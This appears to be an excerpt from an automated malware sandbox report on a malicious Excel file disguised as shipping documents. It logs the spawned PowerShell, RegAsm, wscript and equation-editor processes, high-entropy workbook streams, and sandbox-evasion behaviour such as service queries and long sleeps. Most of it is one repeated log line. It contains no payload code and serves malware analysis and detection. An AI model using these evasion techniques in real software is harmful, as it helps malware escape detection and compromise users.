Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	Stream path 'MBD00023562/Workbook' entropy: 7.93617022232 (max. 8.0)
Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	Stream path 'Workbook' entropy: 7.99933751353 (max. 8.0)
Source: 1E630000.0.dr	Stream path 'MBD00023562/Workbook' entropy: 7.94149170975 (max. 8.0)
Source: 1E630000.0.dr	Stream path 'Workbook' entropy: 7.99956053805 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0040F7A7 Sleep,ExitProcess,

16_2_0040F7A7

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\SysWOW64\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

18_2_0040DD85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

16_2_0041A748

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1367	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4957	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1458	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 8047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: foregroundWindowGot 1632	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6651
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3216
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6713

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3488	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3708	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724	Thread sleep time: -3000000s >= -30000s	Jump to behavior
